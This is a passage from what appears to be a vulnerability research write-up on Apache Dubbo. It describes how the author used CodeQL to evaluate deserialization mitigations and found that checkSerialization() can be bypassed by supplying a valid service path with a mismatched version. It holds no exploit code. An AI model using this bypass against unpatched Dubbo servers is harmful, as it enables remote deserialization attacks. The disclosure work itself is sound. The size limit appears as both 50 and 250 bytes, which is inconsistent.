If the SERIALIZATION_SECURITY_CHECK_KEY is enabled, then the serialization type of the response is forced to match the one in the invocation. Previously, in GHSL-2021-036, I was able to force the server to process a response even if there were no corresponding invocations (requests). We had invocation being null, but that was ok since I was able to reach the deserialization sinks before triggering a NullPointerException (NPE). However, if this check is enabled, I’ll get an NPE in invocation.get(SERIALIZATION_ID_KEY) and therefore I’ll no longer be able to send “unexpected” results. Therefore, this check will effectively protect all the GHSL-2021-036 variants flowing through DecodeableRpcResult

ExchangeCodec.decodeEventData

ExchangeCodec.decodeEventData method

This check will guarantee that the serialization payload will be smaller than 50 bytes. Even though there may be DoS payloads that could fit this size, enabling JEP 290 should account for them. Therefore, as long as the users don’t change this value to something larger than 250 bytes, this check will effectively protect all the GHSL-2021-036 variants flowing through decodeEventData

DecodeableRpcInvocation.decode

DecodeableRpcInvocation.decode method

The bulk of this check will be handled by CodecSupport.checkSerialization()

checkSerialization method

As you can see in the first screenshot, this method will be called with a service path and version provided by the attacker (String path = in.readUTF() and String version = in.readUTF() respectively) which are then used to extract information about the service and the method being accessed (ProviderModel providerModel = repository.lookupExportedServiceWithoutGroup(path + ":" + version);). The goal of this check is to retrieve the server-side defined serialization type. However, if an attacker provides a non-existent path/version pair, the lookupExportedServiceWithoutGroup() call will return a null provider model that will make the application take the logger.warn branch and in turn just print an error message. However, no exception will be thrown and therefore the request will continue to execute normally!

mitigation bypass

Even if I’m able to bypass the checkSerialization control, before I get to the interesting ObjectInput.readObject() in line 155 that deserializes the arguments to the remote method invocation, the repository.lookupService(path) method will check that I’m accessing a valid service in line 136. If I provide an invalid path to bypass the checkSerialization control then I’ll make the lookupService() call in line 136 return a null value which, in turn, will not get the pts variable assigned, and line 146 will throw an exception that will prevent the deserialization of the invocation arguments—or will it?

There is a slight but important difference between the lookupService(path) method used here and the lookupExportedServiceWithoutGroup(path + ":" + version) method used within checkSerialization. The former only looks up a service by its path, while the latter looks up a service by its path and version. Therefore, an attacker can provide:

These values will cause lookupExportedServiceWithoutGroup() to fail, allowing the attacker to bypass the checkSerialization() security control. But the lookupService() call will succeed and therefore the attacker will be able to reach the vulnerable code.

Conclusion

CodeQL is commonly used to detect known vulnerability patterns and their associated variants in code. CodeQL queries are usually written to find very specific vulnerabilities for variant analysis purposes and are often integrated into CI/CD pipelines to automatically detect bugs. However, CodeQL can also serve as an interactive SAST Swiss army knife to support more general code auditing workflows. Since CodeQL makes a program’s AST and dataflows queryable, it has the ability to effectively answer many of the general questions that commonly arise when auditing code, such as which APIs are tainted by user-controlled input?, which integer arithmetic may be influenced by network-controlled data?, and which parts of the code have a high bug density?

By using CodeQL as an audit oracle, I was able to focus my audit efforts on critical and sensitive parts of the application and speed up my audit by providing quick and complete answers for any inquiry I could have. Not just that, while I was analyzing other issues, I was able to stumble upon new “smelly” parts of the code that led to new findings just by looking at what was pointed out by CodeQL. In addition, features such as the reverse partial data flow proved very useful to hoist known sinks and to help me understand how those sinks could be exercised. CodeQL is an auditor’s best friend.

Stay secure!